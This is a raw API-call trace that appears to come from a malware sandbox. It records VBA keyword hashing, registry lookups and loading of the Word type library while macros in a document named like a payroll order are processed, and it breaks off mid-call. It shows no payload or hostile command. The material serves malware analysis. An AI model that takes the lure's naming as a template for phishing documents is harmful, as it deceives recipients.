[0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Go") returned 0x105d67 [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoSub") returned 0x10b425 [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoTo") returned 0x10d70b [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Imp") returned 0x109f18 [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Implements") returned 0x10a988 [0044.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="In") returned 0x105db0 [0044.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input") returned 0x10022a [0044.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input$") returned 0x107767 [0044.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input") returned 0x10022a [0044.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB") returned 0x107785 [0044.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB$") returned 0x100c59 [0044.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB") returned 0x107785 [0044.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InStr") returned 0x10120e [0044.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InStrB") returned 0x10c2fb [0044.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Int") returned 0x109f41 [0044.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0044.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Is") returned 0x105db5 [0044.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LBound") returned 0x101e0b [0044.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0044.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0044.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LenB") returned 0x107cfb [0044.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Let") returned 0x10adff [0044.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Lib") returned 0x10ae81 [0044.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Like") returned 0x1091f3 [0044.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Line") returned 0x109262 [0044.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LINEINPUT") returned 0x1008f1 [0044.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Load") returned 0x10b096 [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Local") returned 0x10353f [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Lock") returned 0x10b0e7 [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Long") returned 0x10b27a [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Loop") returned 0x10b2a8 [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LSet") returned 0x10c69e [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Me") returned 0x105e3b [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid$") returned 0x10566d [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB") returned 0x10568b [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB$") returned 0x102a70 [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB") returned 0x10568b [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mod") returned 0x10b4ba [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module") returned 0x101ee1 [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Name") returned 0x10f2f0 [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="New") returned 0x10b8b3 [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Not") returned 0x10ba23 [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Nothing") returned 0x105f21 [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Null") returned 0x105d87 [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Object") returned 0x102ec1 [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="On") returned 0x105e8e [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Open") returned 0x100767 [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Option") returned 0x10f982 [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Optional") returned 0x10675a [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Or") returned 0x105e92 [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Output") returned 0x10f959 [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ParamArray") returned 0x105941 [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Preserve") returned 0x10a5fc [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Print") returned 0x10f00d [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Property") returned 0x10d2f6 [0044.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PSet") returned 0x10dd55 [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Put") returned 0x10c5b3 [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RaiseEvent") returned 0x10274a [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Random") returned 0x10f428 [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Randomize") returned 0x10ab02 [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Read") returned 0x101d0f [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ReDim") returned 0x10eea8 [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rem") returned 0x10ce0e [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Resume") returned 0x10728b [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Return") returned 0x1038eb [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RGB") returned 0x10ce4d [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RSet") returned 0x106891 [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Scale") returned 0x10e596 [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Seek") returned 0x10e387 [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Select") returned 0x10cabd [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Set") returned 0x10d36e [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sgn") returned 0x10d3b2 [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Shared") returned 0x10479e [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Single") returned 0x10a99f [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Spc") returned 0x10d4f4 [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Static") returned 0x1029c6 [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Step") returned 0x103384 [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Stop") returned 0x1034f6 [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="StrComp") returned 0x10274d [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String$") returned 0x10c31c [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tab") returned 0x10d821 [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text") returned 0x10abed [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Type") returned 0x100007 [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TypeOf") returned 0x101832 [0044.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unload") returned 0x104e44 [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unlock") returned 0x104e95 [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unknown") returned 0x10a11d [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Until") returned 0x10ecec [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Variant") returned 0x108738 [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Wend") returned 0x1035a7 [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="While") returned 0x10a25c [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Width") returned 0x104e68 [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WithEvents") returned 0x10f2eb [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Write") returned 0x105c2e [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Xor") returned 0x10ef9b [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#Const") returned 0x10f8c9 [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#Else") returned 0x1050dd [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#ElseIf") returned 0x10e5b5 [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#End") returned 0x10d478 [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#If") returned 0x10d383 [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Control") returned 0x10a946 [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Description") returned 0x1009d0 [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Ext_KEY") returned 0x10a88e [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_HelpID") returned 0x103e41 [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_Func") returned 0x10c92c [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_Property") returned 0x107f4a [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_PropertyPut") returned 0x106658 [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_PropertyPutRef") returned 0x105b25 [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_MemberFlags") returned 0x108db7 [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0044.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_ProcData") returned 0x107005 [0044.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0044.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarDescription") returned 0x103303 [0044.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarHelpID") returned 0x10a3b6 [0044.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarMemberFlags") returned 0x10b6ea [0044.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarProcData") returned 0x101b0c [0044.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_UserMemId") returned 0x107b95 [0044.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarUserMemId") returned 0x104d5f [0044.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_GlobalNameSpace") returned 0x10ce77 [0044.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName=",") returned 0x101043 [0044.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName=".") returned 0x101045 [0044.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="\"") returned 0x101039 [0044.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_") returned 0x101076 [0044.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLngPtr") returned 0x105ab0 [0044.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLngPtr") returned 0x1036f2 [0044.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PtrSafe") returned 0x106f4a [0044.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLngLng") returned 0x104463 [0044.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLngLng") returned 0x1020a5 [0044.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LongLong") returned 0x10378e [0044.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LongPtr") returned 0x10d4e8 [0044.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0044.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0044.832] StringFromGUID2 (in: rguid=0x7d97730*(Data1=0x20905, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x2061b0, cchMax=39 | out: lpsz="{00020905-0000-0000-C000-000000000046}") returned 39 [0044.832] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x205e70 | out: phkResult=0x205e70*=0x9de) returned 0x0 [0044.833] RegOpenKeyW (in: hKey=0x9de, lpSubKey="{00020905-0000-0000-C000-000000000046}", phkResult=0x205e68 | out: phkResult=0x205e68*=0x9ee) returned 0x0 [0044.833] RegEnumKeyW (in: hKey=0x9ee, dwIndex=0x0, lpName=0x205e98, cchName=0xa | out: lpName="8.7") returned 0x0 [0044.834] wcscpy_s (in: _Destination=0x205e80, _SizeInWords=0xa, _Source="8.7" | out: _Destination="8.7") returned 0x0 [0044.834] RegOpenKeyW (in: hKey=0x9ee, lpSubKey="8.7", phkResult=0x205f28 | out: phkResult=0x205f28*=0x9f6) returned 0x0 [0044.834] _ultoa_s (in: _Val=0x409, _DstBuf=0x205ea0, _Size=0xa, _Radix=16 | out: _DstBuf="409") returned 0x0 [0044.834] RegOpenKeyA (in: hKey=0x9f6, lpSubKey="409", phkResult=0x205e90 | out: phkResult=0x205e90*=0x0) returned 0x2 [0044.834] _ultoa_s (in: _Val=0x9, _DstBuf=0x205ea0, _Size=0xa, _Radix=16 | out: _DstBuf="9") returned 0x0 [0044.834] RegOpenKeyA (in: hKey=0x9f6, lpSubKey="9", phkResult=0x205e90 | out: phkResult=0x205e90*=0x0) returned 0x2 [0044.835] RegOpenKeyA (in: hKey=0x9f6, lpSubKey="0", phkResult=0x205e90 | out: phkResult=0x205e90*=0x9fe) returned 0x0 [0044.835] RegOpenKeyW (in: hKey=0x9fe, lpSubKey="win64", phkResult=0x205e98 | out: phkResult=0x205e98*=0xa06) returned 0x0 [0044.836] RegCloseKey (hKey=0xa06) returned 0x0 [0044.836] RegCloseKey (hKey=0x9fe) returned 0x0 [0044.836] _ultow_s (in: _Value=0x0, _Buffer=0x205f30, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0044.836] RegOpenKeyW (in: hKey=0x9f6, lpSubKey="0", phkResult=0x205f08 | out: phkResult=0x205f08*=0x9fa) returned 0x0 [0044.837] RegQueryValueW (in: hKey=0x9fa, lpSubKey="win64", lpData=0x205f50, lpcbData=0x205f04 | out: lpData="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", lpcbData=0x205f04) returned 0x0 [0044.837] wcscpy_s (in: _Destination=0x206280, _SizeInWords=0x104, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0044.837] RegCloseKey (hKey=0x9fa) returned 0x0 [0044.837] RegCloseKey (hKey=0x9f6) returned 0x0 [0044.837] RegCloseKey (hKey=0x9ee) returned 0x0 [0044.837] RegCloseKey (hKey=0x9de) returned 0x0 [0044.838] LoadTypeLib (in: szFile="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", pptlib=0x205f08*=0x0 | out: pptlib=0x205f08*=0x3dd7b80) returned 0x0 [0044.838] ITypeLib:RemoteGetDocumentation (in: This=0x3dd7b80, index=-1, refPtrFlags=0x205f28, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x836c7d8 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x836c7d8) returned 0x0 [0044.838] IUnknown:QueryInterface (in: This=0x3dd7b80, riid=0x7fee4035c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205d18 | out: ppvObject=0x205d18*=0x0) returned 0x80004002 [0044.838] ITypeLib:RemoteGetLibAttr (in: This=0x3dd7b80, ppTLibAttr=0x205d10, pDummy=0x10 | out: ppTLibAttr=0x205d10, pDummy=0x10) returned 0x0 [0044.838] ITypeLib:RemoteGetDocumentation (in: This=0x3dd7b80, index=-1, refPtrFlags=0x0, pbstrName=0x205d08, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x8003b90 | out: pbstrName=0x205d08*="Microsoft Word 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x8003b90*="⡰߾") returned 0x0 [0044.838] StringFromGUID2 (in: rguid=0x7e02300*(Data1=0x20905, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x205d30, cchMax=39 | out: lpsz="{00020905-0000-0000-C000-000000000046}") returned 39 [0044.838] _ultow_s (in: _Value=0x8, _Buffer=0x205c7a, _BufferCount=0x10, _Radix=16 | out: _Buffer="8") returned 0x0 [0044.838] _ultow_s (in: _Value=0x7, _Buffer=0x205c7e, _BufferCount=0xe, _Radix=16 | out: _Buffer="7") returned 0x0 [0044.838] _ultow_s (in: _Value=0x0, _Buffer=0x205c82, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0044.838] wcscpy_s (in: _Destination=0x27a50a8, _SizeInWords=0x8e, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0044.838] wcscpy_s (in: _Destination=0x27a50ae, _SizeInWords=0x8b, _Source="{00020905-0000-0000-C000-000000000046}" | out: _Destination="{00020905-0000-0000-C000-000000000046}") returned 0x0 [0044.838] wcscpy_s (in: _Destination=0x27a50fa, _SizeInWords=0x65, _Source="#8.7#0#" | out: _Destination="#8.7#0#") returned 0x0 [0044.838] wcscpy_s (in: _Destination=0x27a5108, _SizeInWords=0x5e, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0044.839] wcscpy_s (in: _Destination=0x27a517e, _SizeInWords=0x23, _Source="Microsoft Word 16.0 Object Library" | out: _Destination="Microsoft Word 16.0 Object Library") returned 0x0 [0044.839] ITypeLib:LocalReleaseTLibAttr (This=0x3dd7b80) returned 0x0 [0044.839] IMalloc:Realloc (This=0x7feff045380, pv=0x8119d70, cb=0x1a0) returned 0x2705fa0 [0044.839] wcscpy_s (in: _Destination=0x2705fa0, _SizeInWords=0x8e, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library" | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0044.839] ITypeLib:RemoteGetDocumentation (in: This=0x3dd7b80, index=-1, refPtrFlags=0x205e28, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4) returned 0x0 [0044.839] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Word") returned 0x106bb5 [0044.839] strcpy_s (in: _Dst=0x205c20, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0044.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x205c20, cbMultiByte=5, lpWideCharStr=0x205a70, cchWideChar=5 | out: lpWideCharStr="Word") returned 5 [0044.839] wcsncpy_s (in: _Destination=0x205a20, _SizeInWords=0x108, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0044.839] CharLowerBuffW (in: lpsz="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchLength=0x8d | out: lpsz="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library") returned 0x8d [0044.839] IMalloc:Alloc (This=0x7feff045380, cb=0x11c) returned 0x8085e20 [0044.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", cchWideChar=142, lpMultiByteStr=0x8085e20, cbMultiByte=284, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", lpUsedDefaultChar=0x0) returned 142 [0044.839] IMalloc:Free (This=0x7feff045380, pv=0x8085e20) [0044.839] IMalloc:Realloc (This=0x7feff045380, pv=0x81092c0, cb=0x220) returned 0x80885c0 [0044.839] wcscpy_s (in: _Destination=0x8088670, _SizeInWords=0x8e, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library" | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0044.839] wcsncpy_s (in: _Destination=0x205a60, _SizeInWords=0x108, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0044.839] CharLowerBuffW (in: lpsz="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchLength=0x8d | out: lpsz="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library") returned 0x8d [0044.839] IMalloc:Alloc (This=0x7feff045380, cb=0x11c) returned 0x8085e20 [0044.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", cchWideChar=142, lpMultiByteStr=0x8085e20, cbMultiByte=284, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", lpUsedDefaultChar=0x0) returned 142 [0044.839] IMalloc:Free (This=0x7feff045380, pv=0x8085e20) [0044.839] wcsncpy_s (in: _Destination=0x205a20, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 0x0 [0044.839] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", cchLength=0x37 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc") returned 0x37 [0044.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc", cchWideChar=56, lpMultiByteStr=0x205950, cbMultiByte=112, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc", lpUsedDefaultChar=0x0) returned 56 [0044.839] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 0 [0044.839] IUnknown:AddRef (This=0x3dd7b80) returned 0x3 [0044.839] IUnknown:QueryInterface (in: This=0x3dd7b80, riid=0x7fee40385a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205e48 | out: ppvObject=0x205e48*=0x0) returned 0x80004002 [0044.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x205e10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0044.840] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Word") returned 0x106bb5 [0044.840] IUnknown:Release (This=0x3dd7b80) returned 0x2 [0044.840] GetModuleFileNameW (in: hModule=0x7fee3c90000, lpFilename=0x7fee406e4c0, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")) returned 0x42 [0044.840] QueryPathOfRegTypeLib (in: guid=0x7fee403dd50*(Data1=0x204ef, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), wMaj=0x4, wMin=0x0, lcid=0x409, 